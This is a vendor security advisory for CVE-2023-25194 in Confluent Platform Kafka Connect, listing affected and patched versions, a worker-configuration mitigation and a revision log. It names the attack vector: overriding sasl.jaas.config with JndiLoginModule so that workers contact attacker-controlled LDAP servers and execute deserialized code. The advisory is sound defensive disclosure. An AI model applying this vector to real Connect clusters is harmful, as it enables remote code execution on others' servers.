Version 1.0.2
CVE Reference
Impacted Confluent Platform (CP) versions
- For CP versions 5.5.0 - 5.5.13, 6.0.0 - 6.0.11, 6.1.0 - 6.1.9, 6.2.0 - 6.2.8: By default, these versions are not vulnerable unless Confluent connect worker configurations are overridden using the “connector.client.config.override.policy” property being set to anything other than “None”.
- For CP versions 7.0.0 - 7.0.7, 7.1.0 - 7.1.5, 7.2.0 - 7.2.3, 7.3.0 - 7.3.1: These versions are vulnerable by default since “connector.client.config.override.policy” property is set to “All” in default out of the box configurations.
Confluent Cloud Impact
There is no impact to Confluent Cloud since managed connectors do not support custom SASL JAAS based configurations to be specified.
Recommended Action
Update (02/25/2023): Update to the latest Confluent Platform versions 5.5.14, 6.0.12, 6.1.10, 6.2.9, 7.0.8, 7.1.6, 7.2.4, 7.3.2 that are now published.
Issue Description
A security issue was identified in Apache Kafka Connect (CVE-2023-25194) that is also applicable to Confluent Platform (CP) Kafka Connect clusters. The pre-requisite for this vulnerability requires access to the CP Kafka Connect worker (and CP Connect Kafka REST APIs), along with the ability to create/modify connectors on it with an arbitrary Kafka client SASL JAAS config and a SASL-based security protocol, which has been possible on CP Kafka Connect clusters since versions 5.3.0.
When configuring the connector via the Confluent Platform Kafka Connect REST APIs, an operator can set the `sasl.jaas.config` property for any of the connector's Kafka clients to "com.sun.security.auth.module.JndiLoginModule", which is possible by setting the “producer.override.sasl.jaas.config”, “consumer.override.sasl.jaas.config”, or “admin.override.sasl.jaas.config” properties.
For CP versions 5.5.0 through 6.2.8, Confluent Platform Connect cluster connect worker configurations cannot be overridden unless the these cluster configurations are reconfigured with a connector client override policy that permits such overrides.
For CP versions 7.0.0 through 7.3.1, users are allowed to specify these properties through connector configurations overrides. Thus, the default Confluent Platform Kafka Connect clusters corresponding to these CP versions that are running with out-of-the-box configurations are vulnerable.
The specification of a custom SASL JAAS configuration in a Kafka client in overridden (CP versions <= 6.2.8) or default Connect cluster configurations (CP versions >= 7.0.0) would result in arbitrary connection to an attacker controlled LDAP servers that would deserialize untrusted LDAP responses. This can then be used to execute custom Java code on the Confluent Platform Kafka connect servers. Successful exploitation can result in unrestricted deserialization of untrusted data leading to Remote Code Execution (RCE) attacks leveraging available Java classes in the classpath.
Fix
Confluent Platform patch release versions 5.5.14, 6.0.12, 6.1.10, 6.2.9, 7.0.8, 7.1.6, 7.2.4, 7.3.2 are now published. These fixes provide a configurable system property "-Dorg.apache.kafka.disallowed.login.modules" while disabling the problematic login module "com.sun.security.auth.module.JndiLoginModule" used in SASL JAAS configurations by default.
We advise all Confluent Platform customers to upgrade to the latest patch release versions listed above. If patching is not an option for any reason, kindly follow the steps listed in the Mitigation section below.
Mitigation
We advise all Confluent Platform users to validate connector configurations and only allow trusted JNDI configurations along with enforcement of network access controls to limit the accessibility of CP Connect cluster worker APIs to trusted clients only.
Additionally, as a mitigation, the following property can also be set in the Confluent Platform Connect worker configuration to prevent client configuration overrides:
connector.client.config.override.policy=None
By setting this property on Confluent Platform Kafka Connect workers, custom connector configuration overrides will be disabled completely, and will prevent the use of “*.*.sasl.jaas.config” properties that could otherwise lead to successful exploitation of this vulnerability.
CVSS Score
8.8
CVSS v3.1 Calculator
Revision Log
Date | Status Update |
02/16/2023 | Version 1.0.0 published |
02/17/2023 | Version 1.0.1 published with updated date for patch releases related to the permanent mitigation to be released on 02/24/2023 in the "Updated timeline for release of permanent mitigation fix versions" section. |
02/25/2023 | Versions 1.0.2 published with an update on published patch release versions as noted in "Fix" section. |